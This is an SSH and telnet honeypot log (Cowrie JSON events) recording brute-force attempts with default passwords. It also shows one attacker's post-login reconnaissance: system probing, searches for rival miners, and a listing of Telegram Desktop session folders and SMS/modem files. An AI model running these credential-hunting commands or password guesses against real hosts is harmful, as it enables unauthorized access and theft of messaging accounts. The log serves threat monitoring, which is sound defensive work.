{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:38:41.090069Z","src_ip":"212.227.125.160","session":"689b2ffd0b8c"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T05:38:41.476090Z","src_ip":"212.227.125.160","session":"689b2ffd0b8c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:38:42.582103Z","src_ip":"212.227.125.160","session":"689b2ffd0b8c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44008,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fa86519db2d","protocol":"ssh","message":"New connection: 212.227.125.160:44008 (1.2.3.4:22) [session: 4fa86519db2d]","sensor":"my-vps","timestamp":"2025-08-28T05:38:43.178305Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-08-28T05:38:43.181187Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.client.kex","hassh":"0079dec6da0c13e5e8d1ea56ca556b64","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0079dec6da0c13e5e8d1ea56ca556b64","sensor":"my-vps","timestamp":"2025-08-28T05:38:43.488868Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.session.closed","duration":31.42485237121582,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:38:43.913535Z","src_ip":"212.227.235.229","session":"905b6140eaa0"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T05:38:45.087054Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:38:46.399414Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:38:47.103104Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.command.input","input":"/ip cloud print","message":"CMD: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-28T05:38:47.103777Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.command.failed","input":"/ip cloud print","message":"Command not found: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-28T05:38:47.104171Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","size":30,"shasum":"b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:38:47.412529Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:38:48.047652Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.command.input","input":"ifconfig","message":"CMD: ifconfig","sensor":"my-vps","timestamp":"2025-08-28T05:38:48.048304Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","size":901,"shasum":"1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:38:48.357667Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":28661,"dst_ip":"1.2.3.4","dst_port":22,"session":"6028dd879e00","protocol":"ssh","message":"New connection: 212.227.125.160:28661 (1.2.3.4:22) [session: 6028dd879e00]","sensor":"my-vps","timestamp":"2025-08-28T05:38:48.508291Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T05:38:48.509286Z","src_ip":"212.227.125.160","session":"6028dd879e00"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T05:38:48.589609Z","src_ip":"212.227.125.160","session":"6028dd879e00"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56372,"dst_ip":"1.2.3.4","dst_port":22,"session":"550e14188e94","protocol":"ssh","message":"New connection: 212.227.235.229:56372 (1.2.3.4:22) [session: 550e14188e94]","sensor":"my-vps","timestamp":"2025-08-28T05:38:48.690517Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:38:48.691467Z","src_ip":"212.227.235.229","session":"550e14188e94"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:38:48.837790Z","src_ip":"212.227.235.229","session":"550e14188e94"}
{"eventid":"cowrie.login.failed","username":"david","password":"david","message":"login attempt [david/david] failed","sensor":"my-vps","timestamp":"2025-08-28T05:38:48.994720Z","src_ip":"212.227.125.160","session":"6028dd879e00"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:38:49.093946Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T05:38:49.094640Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54836,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cb3540e6ae0","protocol":"ssh","message":"New connection: 212.227.235.229:54836 (1.2.3.4:22) [session: 6cb3540e6ae0]","sensor":"my-vps","timestamp":"2025-08-28T05:38:49.169139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:38:49.170052Z","src_ip":"212.227.235.229","session":"6cb3540e6ae0"}
{"eventid":"cowrie.login.failed","username":"es","password":"123456","message":"login attempt [es/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:38:49.275816Z","src_ip":"212.227.235.229","session":"550e14188e94"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:38:49.319798Z","src_ip":"212.227.235.229","session":"6cb3540e6ae0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:38:49.402935Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T05:38:49.759660Z","src_ip":"212.227.235.229","session":"6cb3540e6ae0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51048,"dst_ip":"1.2.3.4","dst_port":23,"session":"538b79020d17","protocol":"telnet","message":"New connection: 212.227.235.229:51048 (1.2.3.4:23) [session: 538b79020d17]","sensor":"my-vps","timestamp":"2025-08-28T05:38:49.998799Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51050,"dst_ip":"1.2.3.4","dst_port":23,"session":"8acb943e4168","protocol":"telnet","message":"New connection: 212.227.235.229:51050 (1.2.3.4:23) [session: 8acb943e4168]","sensor":"my-vps","timestamp":"2025-08-28T05:38:50.003342Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:38:50.114563Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo","message":"CMD: cat /proc/cpuinfo","sensor":"my-vps","timestamp":"2025-08-28T05:38:50.115279Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.login.failed","username":"david","password":"abc123","message":"login attempt [david/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:38:50.120206Z","src_ip":"212.227.125.160","session":"6028dd879e00"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:38:50.423146Z","src_ip":"212.227.235.229","session":"550e14188e94"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","size":1412,"shasum":"52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:38:50.428056Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:38:50.907022Z","src_ip":"212.227.235.229","session":"6cb3540e6ae0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:38:51.062376Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.command.input","input":"ps | grep '[Mm]iner'","message":"CMD: ps | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-28T05:38:51.063078Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.login.failed","username":"david","password":"abcd123","message":"login attempt [david/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:38:51.217196Z","src_ip":"212.227.125.160","session":"6028dd879e00"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","size":0,"shasum":"4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:38:51.373321Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:38:52.116567Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.command.input","input":"ps -ef | grep '[Mm]iner'","message":"CMD: ps -ef | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-28T05:38:52.117248Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.login.failed","username":"david","password":"abcd1234","message":"login attempt [david/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T05:38:52.299380Z","src_ip":"212.227.125.160","session":"6028dd879e00"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","size":0,"shasum":"e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:38:52.426220Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:38:53.062832Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.command.input","input":"ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","message":"CMD: ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","sensor":"my-vps","timestamp":"2025-08-28T05:38:53.063533Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","size":794,"shasum":"722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:38:53.376195Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.login.failed","username":"david","password":"abc1234","message":"login attempt [david/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T05:38:53.381108Z","src_ip":"212.227.125.160","session":"6028dd879e00"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:38:54.142280Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.command.input","input":"locate D877F783D5D3EF8Cs","message":"CMD: locate D877F783D5D3EF8Cs","sensor":"my-vps","timestamp":"2025-08-28T05:38:54.143020Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:38:54.463285Z","src_ip":"212.227.125.160","session":"6028dd879e00"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","size":0,"shasum":"3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:38:54.488344Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:38:55.204350Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.command.input","input":"echo Hi | cat -n","message":"CMD: echo Hi | cat -n","sensor":"my-vps","timestamp":"2025-08-28T05:38:55.205384Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","size":11,"shasum":"3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:38:55.514811Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53562,"dst_ip":"1.2.3.4","dst_port":22,"session":"229943802de9","protocol":"ssh","message":"New connection: 212.227.125.160:53562 (1.2.3.4:22) [session: 229943802de9]","sensor":"my-vps","timestamp":"2025-08-28T05:38:56.153687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:38:56.189185Z","src_ip":"212.227.125.160","session":"229943802de9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:38:56.305601Z","src_ip":"212.227.125.160","session":"229943802de9"}
{"eventid":"cowrie.session.closed","duration":33.16376757621765,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:38:56.313965Z","src_ip":"8.222.212.69","session":"34b7607cbc3e"}
{"eventid":"cowrie.login.failed","username":"user","password":"123","message":"login attempt [user/123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:38:56.723082Z","src_ip":"212.227.125.160","session":"229943802de9"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:38:57.830731Z","src_ip":"212.227.125.160","session":"229943802de9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52436,"dst_ip":"1.2.3.4","dst_port":22,"session":"38b30a28bbbc","protocol":"ssh","message":"New connection: 212.227.235.229:52436 (1.2.3.4:22) [session: 38b30a28bbbc]","sensor":"my-vps","timestamp":"2025-08-28T05:39:03.248162Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:39:03.249279Z","src_ip":"212.227.235.229","session":"38b30a28bbbc"}
